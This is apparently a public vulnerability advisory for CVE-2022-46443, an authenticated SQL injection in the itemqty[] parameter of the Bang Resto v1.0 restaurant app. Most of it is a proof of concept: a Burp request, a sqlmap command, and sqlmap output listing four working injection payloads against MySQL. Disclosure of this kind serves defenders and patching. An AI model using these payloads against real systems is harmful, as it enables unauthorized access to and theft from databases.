CVE-2022-46443 - Bang Resto v1.0 Authenticated SQL Injection
Researcher
This vulnerability was discovered by @yuyudhn.
Description
When using ‘waiters’ role, the itemqty%5B%5D parameter on Bangresto v1.0 appears to be vulnerable to SQL injection attacks.
Details
Detail about software affected by CVE-2022-46443.
| Parameter | Description |
|---|---|
| Software | Bang Resto |
| Software Link | https://github.com/mesinkasir/bangresto |
| Vendor | mesinkasir |
| Vulnerable Version | v1.0 |
| Classification | SQL Injection |
| Required privilege | Low (Waiters Role) |
| Publicly disclosed | 2022-12-14 |
Proof of Concept
Burp Requests:
POST /labs/bangresto/staff/insertorder.php HTTP/1.1
Host: localhost
Content-Length: 57
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/labs/bangresto/staff/order.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [waiters cookie]
Connection: close
itemID%5B%5D=1&itemqty%5B%5D=2&sentorder=Sent+to+kitchen
SQLmap
sqlmap -r test.txt -p itemqty%5B%5D
Output
POST parameter 'itemqty[]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 260 HTTP(s) requests:
---
Parameter: itemqty[] (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: itemID[]=1&itemqty[]=(SELECT (CASE WHEN (9140=9140) THEN 2 ELSE (SELECT 7134 UNION SELECT 3807) END))&sentorder=Sent to kitchen
Type: inline query
Title: Generic inline queries
Payload: itemID[]=1&itemqty[]=(SELECT CONCAT(CONCAT(0x716a7a6b71,(CASE WHEN (1964=1964) THEN 0x31 ELSE 0x30 END)),0x7178717a71))&sentorder=Sent to kitchen
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,(SELECT (ELT(9892=9892,1))),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: itemID[]=1&itemqty[]=2 AND (SELECT 1424 FROM (SELECT(SLEEP(5)))jWeg)&sentorder=Sent to kitchen
---
[10:19:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.53, PHP 7.4.29
back-end DBMS: MySQL >= 5.5 (MariaDB fork)